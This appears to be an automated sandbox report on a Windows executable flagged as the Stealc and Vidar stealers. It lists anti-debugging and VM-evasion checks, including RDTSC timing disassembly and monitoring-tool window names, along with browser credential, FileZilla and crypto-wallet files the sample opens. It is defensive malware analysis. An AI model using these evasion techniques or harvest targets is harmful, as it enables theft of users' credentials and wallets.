Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29877 second address: A298B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD6386Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F02BCD63871h 0x0000000f jmp 00007F02BCD6386Bh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F02BCD63874h 0x0000001c push ebx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2A0CD second address: A2A0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F02BD1AD2ECh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2FBD2 second address: A2FBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2FBD7 second address: A2FBDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2FBDD second address: A2FBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3365C second address: A33679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F02BD1AD2E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F02BD1AD2EEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0332 second address: 52A0336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0336 second address: 52A033C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A033C second address: 52A0389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F02BCD63870h 0x0000000f push eax 0x00000010 jmp 00007F02BCD6386Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F02BCD63875h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0389 second address: 52A0399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02BD1AD2ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0399 second address: 52A039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A039D second address: 52A03AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A03AD second address: 52A03B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A03B1 second address: 52A03B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A03B7 second address: 52A03BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A03BD second address: 52A03C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0407 second address: 52A0411 instructions: 0x00000000 rdtsc 0x00000002 mov ah, FBh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0411 second address: 52A0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0415 second address: 52A0438 instructions: 0x00000000 rdtsc 0x00000002 mov cl, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F02BCD63877h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0438 second address: 52A04A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ACFAh 0x00000007 pushfd 0x00000008 jmp 00007F02BD1AD2EBh 0x0000000d or al, FFFFFF9Eh 0x00000010 jmp 00007F02BD1AD2F9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007F02BD1AD2EEh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F02BD1AD2EDh 0x0000002a xor cl, FFFFFF86h 0x0000002d jmp 00007F02BD1AD2F1h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9574BD second address: 9574C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9574C3 second address: 9574C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9574C8 second address: 9574E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02BCD63877h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0B48 second address: 52A0B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0B4E second address: 52A0B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0B52 second address: 52A0B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7A17E6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7A18EB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 94C2C8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 94C62C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 79F072 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 971664 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 95D771 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00554910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0054E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00553EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00554570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0054ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00541160 GetSystemInfo,ExitProcess,

0_2_00541160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: DHCAECGI.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: DHCAECGI.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: DHCAECGI.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: DHCAECGI.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: DHCAECGI.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: DHCAECGI.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2301973505.00000000012D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2301973505.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DHCAECGI.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: DHCAECGI.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: DHCAECGI.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: DHCAECGI.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: DHCAECGI.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: DHCAECGI.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: DHCAECGI.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: DHCAECGI.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: DHCAECGI.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: DHCAECGI.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: DHCAECGI.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: DHCAECGI.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: DHCAECGI.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: DHCAECGI.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: DHCAECGI.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: DHCAECGI.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: DHCAECGI.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: DHCAECGI.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: DHCAECGI.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: DHCAECGI.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: DHCAECGI.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: DHCAECGI.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: DHCAECGI.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: DHCAECGI.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: DHCAECGI.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58370
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58392
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58383
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58373
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59559
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58424

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005445C0

Source: C:\Users\user\Desktop\file.exe

0_2_00559860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559750 mov eax, dword ptr fs:[00000030h]

0_2_00559750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00557850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C68B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6132, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00559600

Source: file.exe, file.exe, 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: XProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B341 cpuid

0_2_6C68B341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00557B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00556920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00556920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00557850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00557A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2074330924.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6132, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6132, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe	String found in binary or memory: \Electrum\wallets\
Source: file.exe	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe	String found in binary or memory: \Exodus\
Source: file.exe	String found in binary or memory: info.seco
Source: file.exe	String found in binary or memory: ElectrumLTC
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: exodus.conf.json
Source: file.exe, 00000000.00000002.2301973505.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: \MultiDoge\
Source: file.exe	String found in binary or memory: seed.seco
Source: file.exe	String found in binary or memory: keystore
Source: file.exe	String found in binary or memory: \Electrum-LTC\wallets\
Source: file.exe, 00000000.00000002.2301973505.00000000012EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.n

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
